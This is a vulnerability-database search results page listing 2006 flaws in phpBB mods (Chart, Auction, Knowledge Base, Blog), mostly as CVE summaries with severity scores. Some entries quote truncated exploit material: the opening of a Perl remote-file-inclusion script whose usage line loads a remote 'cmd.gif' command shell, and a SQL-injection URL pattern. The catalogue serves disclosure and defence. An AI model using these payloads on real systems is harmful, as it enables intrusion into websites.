Lucene search
K

2972 matches found

NVD
NVD
added 2006/05/15 4:6 p.m.13 views

CVE-2006-2359

Cross-site scripting XSS vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection...

4.3CVSS6.5AI score0.00995EPSS
Exploits0References5
Prion
Prion
added 2006/05/15 4:6 p.m.21 views

Sql injection

SQL injection vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter...

7.5CVSS9.1AI score0.01123EPSS
Exploits0References5
CVE
CVE
added 2006/05/15 4:0 p.m.47 views

CVE-2006-2359

XSS vulnerability CVE-2006-2359 affects the phpBB Chart mod (charts.php) via the id parameter. The issue allows remote attackers to inject arbitrary script/HTML, with the note that it may stem from SQL injection. Base metrics indicate MEDIUM risk (CVSSv2: AV=N/AC=M/Au=N/C=N/I=P/A=N, base score 4....

4.3CVSS6.5AI score0.00995EPSS
Exploits0References5Affected Software1
exploitpack
exploitpack
added 2006/05/11 12:0 a.m.9 views

phpBB Chart Mod 1.1 - charts.php?id SQL Injection

phpBB Chart Mod 1.1 - charts.php?id SQL Injection source: https://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application t...

0.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/05/11 12:0 a.m.24 views

phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection

source: https://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. A...

7.4AI score
Exploits0
NVD
NVD
added 2006/05/09 10:2 a.m.18 views

CVE-2006-2245

PHP remote file inclusion vulnerability in auction\auctioncommon.php in Auction mod 1.3m for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

6.8CVSS7.6AI score0.07562EPSS
Exploits0References6
Prion
Prion
added 2006/05/09 10:2 a.m.19 views

Remote file inclusion

PHP remote file inclusion vulnerability in auction\auctioncommon.php in Auction mod 1.3m for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

6.8CVSS7.8AI score0.07562EPSS
Exploits0References6Affected Software1
Cvelist
Cvelist
added 2006/05/09 10:0 a.m.25 views

CVE-2006-2245

PHP remote file inclusion vulnerability in auction\auctioncommon.php in Auction mod 1.3m for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

7.6AI score0.07562EPSS
Exploits0References6
exploitpack
exploitpack
added 2006/05/04 12:0 a.m.65 views

Auction 1.3m - phpbb_root_path Remote File Inclusion

Auction 1.3m - phpbbrootpath Remote File Inclusion !/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd...

0.2AI score
Exploits0
Exploit DB
Exploit DB
added 2006/05/04 12:0 a.m.115 views

Auction 1.3m - 'phpbb_root_path' Remote File Inclusion

!/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path =...

7.4AI score
Exploits0
Prion
Prion
added 2006/05/02 10:2 a.m.16 views

Remote file inclusion

PHP remote file inclusion vulnerability in /includes/kbconstants.php in Knowledge Base Mod for PHPbb 2.0.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...

5.1CVSS8.1AI score0.09499EPSS
Exploits1References5Affected Software1
NVD
NVD
added 2006/05/02 10:2 a.m.12 views

CVE-2006-2134

PHP remote file inclusion vulnerability in /includes/kbconstants.php in Knowledge Base Mod for PHPbb 2.0.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...

5.1CVSS7.6AI score0.09499EPSS
Exploits1References5
Cvelist
Cvelist
added 2006/05/02 10:0 a.m.21 views

CVE-2006-2134

PHP remote file inclusion vulnerability in /includes/kbconstants.php in Knowledge Base Mod for PHPbb 2.0.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...

7.6AI score0.09499EPSS
Exploits1References5
securityvulns
securityvulns
added 2006/05/02 12:0 a.m.36 views

Blog Mod <= 0.2.x SQL Injection

==================== Discovered by: Qex Date: 28 April 2006 ==================== /weblogposting.php?mode=quote&r=SQL&w=1...

1.5AI score
Exploits0
Prion
Prion
added 2006/05/01 11:2 p.m.12 views

Sql injection

SQL injection vulnerability in weblogposting.php in Blog Mod 0.2.x allows remote attackers to execute arbitrary SQL commands via the r parameter...

6.4CVSS9.1AI score0.01514EPSS
Exploits0References5Affected Software1
NVD
NVD
added 2006/05/01 11:2 p.m.14 views

CVE-2006-2127

SQL injection vulnerability in weblogposting.php in Blog Mod 0.2.x allows remote attackers to execute arbitrary SQL commands via the r parameter...

6.4CVSS8.4AI score0.01514EPSS
Exploits0References5
Cvelist
Cvelist
added 2006/05/01 11:0 p.m.16 views

CVE-2006-2127

SQL injection vulnerability in weblogposting.php in Blog Mod 0.2.x allows remote attackers to execute arbitrary SQL commands via the r parameter...

8.4AI score0.01514EPSS
Exploits0References5
CVE
CVE
added 2006/05/01 11:0 p.m.47 views

CVE-2006-2127

CVE-2006-2127 affects Blog Mod 0.2.x; a SQL injection in weblog_posting.php allows remote attackers to execute arbitrary SQL via the r parameter, with a base risk score of 6.4 (Medium). No explicit remediation or exploit details are provided in the connected documents.

6.4CVSS8.4AI score0.01514EPSS
Exploits0References5Affected Software1
exploitpack
exploitpack
added 2006/05/01 12:0 a.m.59 views

phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion

phpBB Knowledge Base 2.0.2 - Mod KBconstants.php Remote File Inclusion source: https://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An...

Exploits0
Exploit DB
Exploit DB
added 2006/05/01 12:0 a.m.70 views

phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file...

7.4AI score
Exploits0
Rows per page
Query Builder